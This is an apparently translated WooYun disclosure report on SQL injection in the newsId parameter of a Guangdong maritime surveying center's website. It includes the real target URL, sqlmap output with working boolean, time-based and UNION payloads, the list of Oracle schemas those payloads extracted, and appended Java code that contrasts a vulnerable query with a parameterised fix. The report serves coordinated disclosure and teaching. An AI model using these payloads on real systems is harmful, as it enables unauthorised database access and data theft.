Vulnerability summary

Defect ID: wooyun-2015-0109397

Title: SQL injection vulnerability at Guangdong Maritime Surveying and Mapping Center (广东海事测绘中心)

Vendor: Guangdong Maritime Surveying and Mapping Center (广东海事测绘中心)

Author: depycode

Submitted: 2015-04-24 17:59

Fixed: 2015-06-12 10:26

Disclosed: 2015-06-12 10:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-04-24: Details sent to the vendor, awaiting vendor action
2015-04-28: Vendor confirmed; details disclosed to the vendor only
2015-05-08: Details disclosed to core white hats and domain experts
2015-05-18: Details disclosed to regular white hats
2015-05-28: Details disclosed to intern white hats
2015-06-12: Details disclosed to the public

Brief description:

See title.

Detailed description:

url:http://www.gdhydro.com/

[Screenshot: 1.jpg]

SQL injection:

http://www.gdhydro.com/MaritimeManage/portal/news/news_info.jsp?newsId=2149


[12:07:51] [INFO] testing 'Oracle AND time-based blind'
[12:08:22] [INFO] GET parameter 'newsId' seems to be 'Oracle AND time-based blind' injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] y
[12:08:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:08:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:08:27] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:08:30] [INFO] target URL appears to have 11 columns in query
[12:08:31] [INFO] GET parameter 'newsId' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'newsId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 44 HTTP(s) requests:
---
Parameter: newsId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsId=2149 AND 3997=3997
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: newsId=2149 AND 8821=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(117)||CHR(120)||CHR(97),5)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: newsId=2149 UNION ALL SELECT NULL,CHR(113)||CHR(98)||CHR(106)||CHR(106)||CHR(113)||CHR(88)||CHR(72)||CHR(117)||CHR(118)||CHR(106)||CHR(83)||CHR(104)||CHR(66)||CHR(78)||CHR(108)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
[12:08:34] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:08:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:08:34] [INFO] fetching database (schema) names
[12:08:34] [INFO] the SQL query used returns 26 entries
[12:08:35] [INFO] retrieved: CTXSYS
[12:08:36] [INFO] retrieved: DBSNMP
[12:08:36] [INFO] retrieved: DMSYS
[12:08:37] [INFO] retrieved: EXFSYS
[12:08:38] [INFO] retrieved: GDHPD
[12:08:38] [INFO] retrieved: GDHPDWEB
[12:08:39] [INFO] retrieved: HR
[12:08:40] [INFO] retrieved: IX
[12:08:40] [INFO] retrieved: MARITIME
[12:08:41] [INFO] retrieved: MDSYS
[12:08:42] [INFO] retrieved: NTM
[12:08:42] [INFO] retrieved: NTM_EN
[12:08:43] [INFO] retrieved: OE
[12:08:43] [INFO] retrieved: OLAPSYS
[12:08:44] [INFO] retrieved: ORDSYS
[12:08:45] [INFO] retrieved: OUTLN
[12:08:45] [INFO] retrieved: PM
[12:08:46] [INFO] retrieved: SCGRID
[12:08:47] [INFO] retrieved: SCOTT
[12:08:47] [INFO] retrieved: SH
[12:08:49] [INFO] retrieved: SYS
[12:08:50] [INFO] retrieved: SYSMAN
[12:08:50] [INFO] retrieved: SYSTEM
[12:08:51] [INFO] retrieved: TSMSYS
[12:08:52] [INFO] retrieved: WMSYS
[12:08:53] [INFO] retrieved: XDB
available databases [26]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GDHPD
[*] GDHPDWEB
[*] HR
[*] IX
[*] MARITIME
[*] MDSYS
[*] NTM
[*] NTM_EN
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCGRID
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


Login address:

http://www.gdhydro.com/login.html

Proof of vulnerability:

available databases [26]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GDHPD
[*] GDHPDWEB
[*] HR
[*] IX
[*] MARITIME
[*] MDSYS
[*] NTM
[*] NTM_EN
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCGRID
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

Fix recommendation:

Filter the input.
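As an added illustration (not code from the report or from the affected site), the following Java shows the pattern behind a flaw like this one, where a JSP page concatenates the newsId request parameter into an Oracle query, next to the fix the report recommends: validate the parameter as the integer it is supposed to be, then bind it with a PreparedStatement. Class, method, table and column names are assumed.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// Hypothetical data-access class; table "news" and its columns are assumed.
public class NewsInfoDao {

    // VULNERABLE pattern: the raw request parameter becomes part of the SQL
    // text, so a value such as "2149 AND 3997=3997" or "2149 UNION ALL SELECT ..."
    // changes the statement itself. Kept only to show what the fix replaces.
    public static String buildVulnerableQuery(String newsId) {
        return "SELECT title, content FROM news WHERE news_id = " + newsId;
    }

    // Fix, step 1 (input filtering): newsId is a numeric key, so reject anything
    // that is not a plain positive integer before it reaches the database layer.
    public static long parseNewsId(String raw) {
        if (raw == null || !raw.matches("[1-9]\\d{0,17}")) {
            throw new IllegalArgumentException("newsId must be a positive integer");
        }
        return Long.parseLong(raw);
    }

    // Fix, step 2 (parameter binding): the SQL text is fixed and the driver sends
    // the value separately, so no input can add UNION, AND or function calls.
    public static String fetchTitle(Connection conn, long newsId) throws SQLException {
        String sql = "SELECT title FROM news WHERE news_id = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setLong(1, newsId);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("title") : null;
            }
        }
    }

    // Usage from a servlet or JSP: validate first, then query with the bound value.
    public static String handleRequest(Connection conn, String rawNewsId) throws SQLException {
        long newsId = parseNewsId(rawNewsId);   // throws on "2149 AND 3997=3997"
        return fetchTitle(conn, newsId);
    }
}
```

Validation alone would stop the payloads shown in the sqlmap output, but the PreparedStatement is what removes the injection class entirely, including for string-typed parameters where a regex would be much harder to get right.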

Copyright notice: please credit the source when reproducing: depycode@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-04-28 10:24

Vendor reply:

Forwarded by CNCERT to the relevant branch center, which will coordinate handling with the organization that manages the website.

Latest status:

None yet